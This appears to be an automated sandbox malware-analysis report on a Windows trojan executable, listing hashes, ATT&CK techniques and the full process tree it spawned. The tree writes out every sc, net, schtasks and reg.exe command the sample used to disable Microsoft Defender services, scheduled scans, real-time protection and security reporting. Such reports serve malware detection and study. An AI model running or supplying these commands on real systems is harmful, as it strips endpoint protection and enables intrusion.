15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693

General

Target

15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
Size

269KB
MD5

6161cfa4c704ec1eff18ec8af42c72c7
SHA1

00bb164985ae6bfab56db839433618d505be5076
SHA256

15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693
SHA512

8e4bef47649706800034e1275d5882124c8342b0a0fb418c2f5e8ef14a103e8a321a76dde8772eff5da1f2b27cae072f45ac88f79f4ec655cc3670c7b7c1b46f

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Runs net.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.execmd.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 4780 wrote to memory of 3452	4780	15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe	cmd.exe
PID 4780 wrote to memory of 3452	4780	15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe	cmd.exe
PID 3452 wrote to memory of 4024	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 4024	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 1428	3452	cmd.exe	net.exe
PID 3452 wrote to memory of 1428	3452	cmd.exe	net.exe
PID 1428 wrote to memory of 4440	1428	net.exe	net1.exe
PID 1428 wrote to memory of 4440	1428	net.exe	net1.exe
PID 3452 wrote to memory of 2076	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 2076	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 3752	3452	cmd.exe	net.exe
PID 3452 wrote to memory of 3752	3452	cmd.exe	net.exe
PID 3752 wrote to memory of 3312	3752	net.exe	net1.exe
PID 3752 wrote to memory of 3312	3752	net.exe	net1.exe
PID 3452 wrote to memory of 4084	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 4084	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 3528	3452	cmd.exe	net.exe
PID 3452 wrote to memory of 3528	3452	cmd.exe	net.exe
PID 3528 wrote to memory of 4160	3528	net.exe	net1.exe
PID 3528 wrote to memory of 4160	3528	net.exe	net1.exe
PID 3452 wrote to memory of 4688	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 4688	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 4128	3452	cmd.exe	net.exe
PID 3452 wrote to memory of 4128	3452	cmd.exe	net.exe
PID 4128 wrote to memory of 548	4128	net.exe	net1.exe
PID 4128 wrote to memory of 548	4128	net.exe	net1.exe
PID 3452 wrote to memory of 424	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 424	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 4572	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 4572	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 1224	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 1224	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 400	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 400	3452	cmd.exe	schtasks.exe
PID 3452 wrote to memory of 1532	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 1532	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3524	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3524	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4784	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4784	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 2752	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 2752	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 2876	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 2876	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 2288	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 2288	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 228	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 228	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4348	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4348	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4964	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4964	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3172	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3172	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4748	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4748	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4764	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 4764	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 5108	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 5108	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3632	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3632	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3508	3452	cmd.exe	reg.exe
PID 3452 wrote to memory of 3508	3452	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
"C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DC1C.tmp\DC2D.tmp\DC2E.bat C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3452

C:\Windows\system32\sc.exe
sc config Sense start= disabled
3⤵
PID:4024

C:\Windows\system32\net.exe
net stop Sense
3⤵
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sense
4⤵
PID:4440

C:\Windows\system32\sc.exe
sc config WdFilter start= disabled
3⤵
PID:2076

C:\Windows\system32\net.exe
net stop WdFilter
3⤵
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WdFilter
4⤵
PID:3312

C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
3⤵
PID:4084

C:\Windows\system32\net.exe
net stop WdNisSvc Track
3⤵
- Suspicious use of WriteProcessMemory
PID:3528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WdNisSvc Track
4⤵
PID:4160

C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
3⤵
PID:4688

C:\Windows\system32\net.exe
net stop WinDefend
3⤵
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WinDefend
4⤵
PID:548

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
3⤵
PID:424

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
3⤵
PID:4572

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
3⤵
PID:1224

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
3⤵
PID:400

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
3⤵
PID:1532

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:3524

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
3⤵
PID:4784

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableAntiSpywareRealtimeProtection" /t REG_DWORD /d "1" /f
3⤵
PID:2752

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:2876

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DpaDisabled" /t REG_DWORD /d "1" /f
3⤵
PID:2288

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:228

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
3⤵
PID:4348

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
3⤵
PID:4964

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
3⤵
PID:3172

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
3⤵
PID:4748

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
3⤵
PID:4764

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ProductStatus" /t REG_DWORD /d "0" /f
3⤵
PID:5108

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ManagedDefenderProductType" /t REG_DWORD /d "0" /f
3⤵
PID:3632

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
3⤵
PID:3508

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:1040

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
3⤵
PID:3536

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "OneTimeSqmDataSent" /t REG_DWORD /d "0" /f
3⤵
PID:4512

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "AutomaticallyCleanAfterScan" /t REG_DWORD /d "0" /f
3⤵
PID:4288

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t REG_DWORD /d "8" /f
3⤵
PID:4484

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "AllowNonAdminFunctionality" /t REG_DWORD /d "0" /f
3⤵
PID:1796

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t REG_DWORD /d "1" /f
3⤵
PID:4992

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:2952

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
3⤵
PID:2300

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3468

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Disabling Security Tools

1

T1089

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DC1C.tmp\DC2D.tmp\DC2E.bat
Filesize
3KB

MD5
810407dc9da6b1688b552d84e3ff11bf

SHA1
27166f30e433b396ad96f7bc5cadb95afde66e16

SHA256
3cc739dcee739bbff3e609074d488fe108c58dcba7416a4a1941b79bf9d96aa2

SHA512
f1d45b73cb7f2145ea50a9aa6aa0f3326d60ffb5d6f7d37b7cfb93864af379e81e5a977aa5c3080313837769eb6223b8efadb84a8d4f99517bf3fbf6e245fdaf

Download Submit
memory/228-154-0x0000000000000000-mapping.dmp

Download
memory/400-147-0x0000000000000000-mapping.dmp

Download
memory/424-144-0x0000000000000000-mapping.dmp

Download
memory/548-143-0x0000000000000000-mapping.dmp

Download
memory/1040-163-0x0000000000000000-mapping.dmp

Download
memory/1224-146-0x0000000000000000-mapping.dmp

Download
memory/1428-133-0x0000000000000000-mapping.dmp

Download
memory/1532-148-0x0000000000000000-mapping.dmp

Download
memory/1796-168-0x0000000000000000-mapping.dmp

Download
memory/2076-135-0x0000000000000000-mapping.dmp

Download
memory/2288-153-0x0000000000000000-mapping.dmp

Download
memory/2300-171-0x0000000000000000-mapping.dmp

Download
memory/2752-151-0x0000000000000000-mapping.dmp

Download
memory/2876-152-0x0000000000000000-mapping.dmp

Download
memory/2952-170-0x0000000000000000-mapping.dmp

Download
memory/3172-157-0x0000000000000000-mapping.dmp

Download
memory/3312-137-0x0000000000000000-mapping.dmp

Download
memory/3452-130-0x0000000000000000-mapping.dmp

Download
memory/3468-172-0x0000000000000000-mapping.dmp

Download
memory/3508-162-0x0000000000000000-mapping.dmp

Download
memory/3524-149-0x0000000000000000-mapping.dmp

Download
memory/3528-139-0x0000000000000000-mapping.dmp

Download
memory/3536-164-0x0000000000000000-mapping.dmp

Download
memory/3632-161-0x0000000000000000-mapping.dmp

Download
memory/3752-136-0x0000000000000000-mapping.dmp

Download
memory/4024-132-0x0000000000000000-mapping.dmp

Download
memory/4084-138-0x0000000000000000-mapping.dmp

Download
memory/4128-142-0x0000000000000000-mapping.dmp

Download
memory/4160-140-0x0000000000000000-mapping.dmp

Download
memory/4288-166-0x0000000000000000-mapping.dmp

Download
memory/4348-155-0x0000000000000000-mapping.dmp

Download
memory/4440-134-0x0000000000000000-mapping.dmp

Download
memory/4484-167-0x0000000000000000-mapping.dmp

Download
memory/4512-165-0x0000000000000000-mapping.dmp

Download
memory/4572-145-0x0000000000000000-mapping.dmp

Download
memory/4688-141-0x0000000000000000-mapping.dmp

Download
memory/4748-158-0x0000000000000000-mapping.dmp

Download
memory/4764-159-0x0000000000000000-mapping.dmp

Download
memory/4784-150-0x0000000000000000-mapping.dmp

Download
memory/4964-156-0x0000000000000000-mapping.dmp

Download
memory/4992-169-0x0000000000000000-mapping.dmp

Download
memory/5108-160-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing